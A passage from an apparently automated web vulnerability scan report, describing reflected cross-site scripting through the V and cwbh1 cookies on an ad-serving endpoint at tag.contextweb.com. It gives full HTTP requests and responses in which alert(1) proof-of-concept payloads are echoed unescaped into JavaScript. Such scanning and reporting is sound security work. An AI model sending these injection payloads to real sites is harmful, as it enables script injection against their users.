Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&ca=VIEWAD&cp=526735&ct=80710&cf=300X250&cn=1&rq=1&dw=1112&cwu=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&mrnd=65940194&if=0&tl=1&pxy=0,0&cxy=1096,3334&dxy=1096,3334&tz=360&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJjc9370'%3balert(1)//736866c8cde; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB30
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2654
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:57 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJjc9370'%3balert(1)//736866c8cde; domain=.contextweb.com; expires=Tue, 14-Feb-2012 01:36:57 GMT; path=/
Set-Cookie: 526735_300X250_80710=2/13/2011 8:36:57 PM; domain=.contextweb.com; path=/
Set-Cookie: cr=292|1|-8589035730497595512|1%0a58|1|-8589033546683363385|1; domain=.contextweb.com; expires=Thu, 09-Feb-2012 01:36:57 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Mon, 14-Feb-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="JavaScript" type="text/javascript">\n'
+ 'document.write(\'<script language="JavaScript" src="http://optimized-by.rubiconproject.com/a/dk.js?defaulting_ad=x3
...[SNIP]...
<IFRAME SRC="http://aperture.displaymarketplace.com/audmeasure.gif?liveconclientID=3706557521217&CreativeID=&PlacementID=68&EventType=Impression&PixelID=100&rand=1394027073&cuID=gFEcJzqCjXJjc9370';alert(1)//736866c8cde&eventGuid=eloDgANSEiOf"HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO">
...[SNIP]...

1.504. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TAGPUBLISH/getad.aspx

Issue detail

The value of the cwbh1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d120'-alert(1)-'2f4c41a9c0d was submitted in the cwbh1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&ca=VIEWAD&cp=526735&ct=80710&cf=300X250&cn=1&rq=1&dw=1112&cwu=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&mrnd=65940194&if=0&tl=1&pxy=0,0&cxy=1096,3334&dxy=1096,3334&tz=360&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU16d120'-alert(1)-'2f4c41a9c0d; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2658
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:58 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Tue, 14-Feb-2012 01:36:58 GMT; path=/
Set-Cookie: 526735_300X250_80710=2/13/2011 8:36:58 PM; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Mon, 14-Feb-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="JavaScript" type="text/javascript">\n'
+ 'document.write(\'<script language="JavaScript" src="http://optimized-by.rubiconproject.com/a/dk.js?defaulting_ad=x3
...[SNIP]...
<IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.,526735,1518,749,,TOT09,RCQU1,RCQU9,FOCI1,DOTM2,AMQU16d120'-alert(1)-'2f4c41a9c0d,300X250" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO">
...[SNIP]...
